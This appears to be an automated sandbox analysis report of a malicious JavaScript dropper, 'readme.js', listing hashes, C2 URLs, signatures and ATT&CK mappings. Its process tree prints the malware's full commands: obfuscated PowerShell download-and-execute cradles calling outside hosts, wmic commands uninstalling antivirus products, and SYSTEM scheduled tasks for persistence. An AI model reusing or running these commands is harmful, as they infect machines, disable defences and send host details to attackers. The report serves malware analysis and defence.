Analysis

  • max time kernel
    15s
  • max time network
    89s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-01-2021 06:49

General

  • Target

    readme.js

  • Size

    10KB

  • MD5

    db49b6f1f379122685be9553c5cc0f37

  • SHA1

    45788a5c0c0d97d9bed9c0e6115eca1edbad8ba6

  • SHA256

    d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09

  • SHA512

    1eae9f302d90b3a1887b9f74927bf9bfac0519ae0f4019497177eca3ac2086ed71b4296193bcf62ba493d7fe2e4d57f42ded79ed5e8789abca206a2185ebab23

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://t.zz3r0.com

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://t.zer9g.com

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://t.bb3u9.com

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:648
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\system32\notepad.exe
        notepad C:\Users\Admin\AppData\Local\Temp\readme.js
        3⤵
        • Opens file in notepad (likely ransom note)
        PID:696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4052
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 1
          4⤵
            PID:2452
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2260
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
            4⤵
              PID:3356
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
                5⤵
                  PID:208
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
                4⤵
                  PID:4076
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
                    5⤵
                      PID:3024
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
                    4⤵
                      PID:3032
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
                        5⤵
                          PID:1188
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
                        4⤵
                          PID:2116
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
                            5⤵
                              PID:1836
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
                            4⤵
                              PID:2932
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
                                5⤵
                                  PID:2996
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
                                4⤵
                                  PID:868
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
                                    5⤵
                                      PID:2052
                                  • C:\Windows\system32\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
                                    4⤵
                                      PID:3920
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
                                        5⤵
                                          PID:3124
                                      • C:\Windows\system32\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
                                        4⤵
                                          PID:3872
                                        • C:\Windows\system32\schtasks.exe
                                          "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
                                          4⤵
                                          • Creates scheduled task(s)
                                          PID:3972
                                        • C:\Windows\system32\schtasks.exe
                                          "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \eDTR6r3P4nC /F /tr "powershell -w hidden -c PS_CMD"
                                          4⤵
                                          • Creates scheduled task(s)
                                          PID:3872
                                        • C:\Windows\system32\schtasks.exe
                                          "C:\Windows\system32\schtasks.exe" /run /tn \eDTR6r3P4nC
                                          4⤵
                                            PID:4216
                                          • C:\Windows\system32\schtasks.exe
                                            "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn LmHfWZxK4\4aSTNpL0 /F /tr "powershell -w hidden -c PS_CMD"
                                            4⤵
                                            • Creates scheduled task(s)
                                            PID:4528
                                          • C:\Windows\system32\schtasks.exe
                                            "C:\Windows\system32\schtasks.exe" /run /tn LmHfWZxK4\4aSTNpL0
                                            4⤵
                                              PID:4732
                                            • C:\Windows\system32\schtasks.exe
                                              "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\FI1O5lZUNgL\C4tHFX /F /tr "powershell -w hidden -c PS_CMD"
                                              4⤵
                                              • Creates scheduled task(s)
                                              PID:4324
                                            • C:\Windows\system32\schtasks.exe
                                              "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\FI1O5lZUNgL\C4tHFX
                                              4⤵
                                                PID:4288
                                        • C:\Windows\system32\msiexec.exe
                                          C:\Windows\system32\msiexec.exe /V
                                          1⤵
                                            PID:3872
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
                                            1⤵
                                              PID:4236
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
                                              1⤵
                                                PID:4752
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
                                                1⤵
                                                  PID:4268

                                                Network

                                                MITRE ATT&CK Matrix ATT&CK v6

                                                Execution

                                                Scheduled Task

                                                1
                                                T1053

                                                Persistence

                                                Scheduled Task

                                                1
                                                T1053

                                                Privilege Escalation

                                                Scheduled Task

                                                1
                                                T1053

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                  MD5

                                                  8a313b70fd641fc4e6fffb40391d0b4d

                                                  SHA1

                                                  22684fe19ecd7943ac18e622db0d7f161db500e8

                                                  SHA256

                                                  bd33eb064e32cf8d9af160e3304d3f0e1b90bdc9ab5116c16ba87d9a14060911

                                                  SHA512

                                                  5b72cd7e301ad3825bf1465840f52abb885c2481700df5dfa299c30aa6b61613dac8fc1386895cffec48b8229cba77085f672a80e42d7fd07c73eafd962e1246

                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  MD5

                                                  b7ce5874fdff5e4fccdc0fbd21ae7971

                                                  SHA1

                                                  980d0d37b937620706eabba421e2e5b30a4b15f7

                                                  SHA256

                                                  1933f8e519dbd64305997d47fa8a68b2184a8a66ea1d187cc82d788e684fe4b9

                                                  SHA512

                                                  7e33fdf9cc1f1525b23fc960d2e8294d34272701100877a2a5b1028f32e7161e38d8e518bf41ddcca9a050755b05efa3cb86ba22c8e89e06555482a6ab04ee3b

                                                • memory/208-15-0x0000000000000000-mapping.dmp
                                                • memory/696-3-0x0000000000000000-mapping.dmp
                                                • memory/868-24-0x0000000000000000-mapping.dmp
                                                • memory/1188-19-0x0000000000000000-mapping.dmp
                                                • memory/1836-21-0x0000000000000000-mapping.dmp
                                                • memory/2052-25-0x0000000000000000-mapping.dmp
                                                • memory/2116-20-0x0000000000000000-mapping.dmp
                                                • memory/2260-12-0x0000024FCF2E0000-0x0000024FCF2E1000-memory.dmp
                                                  Filesize

                                                  4KB

                                                • memory/2260-10-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp
                                                  Filesize

                                                  9.9MB

                                                • memory/2260-9-0x0000000000000000-mapping.dmp
                                                • memory/2452-8-0x0000000000000000-mapping.dmp
                                                • memory/2848-2-0x0000000000000000-mapping.dmp
                                                • memory/2932-22-0x0000000000000000-mapping.dmp
                                                • memory/2996-23-0x0000000000000000-mapping.dmp
                                                • memory/3024-17-0x0000000000000000-mapping.dmp
                                                • memory/3032-18-0x0000000000000000-mapping.dmp
                                                • memory/3124-27-0x0000000000000000-mapping.dmp
                                                • memory/3356-14-0x0000000000000000-mapping.dmp
                                                • memory/3872-28-0x0000000000000000-mapping.dmp
                                                • memory/3872-30-0x0000000000000000-mapping.dmp
                                                • memory/3920-26-0x0000000000000000-mapping.dmp
                                                • memory/3972-29-0x0000000000000000-mapping.dmp
                                                • memory/4052-7-0x00000171E4140000-0x00000171E4141000-memory.dmp
                                                  Filesize

                                                  4KB

                                                • memory/4052-6-0x00000171E3F90000-0x00000171E3F91000-memory.dmp
                                                  Filesize

                                                  4KB

                                                • memory/4052-5-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp
                                                  Filesize

                                                  9.9MB

                                                • memory/4052-4-0x0000000000000000-mapping.dmp
                                                • memory/4076-16-0x0000000000000000-mapping.dmp
                                                • memory/4216-31-0x0000000000000000-mapping.dmp
                                                • memory/4236-32-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp
                                                  Filesize

                                                  9.9MB

                                                • memory/4268-44-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp
                                                  Filesize

                                                  9.9MB

                                                • memory/4288-43-0x0000000000000000-mapping.dmp
                                                • memory/4324-42-0x0000000000000000-mapping.dmp
                                                • memory/4528-35-0x0000000000000000-mapping.dmp
                                                • memory/4732-36-0x0000000000000000-mapping.dmp
                                                • memory/4752-38-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp
                                                  Filesize

                                                  9.9MB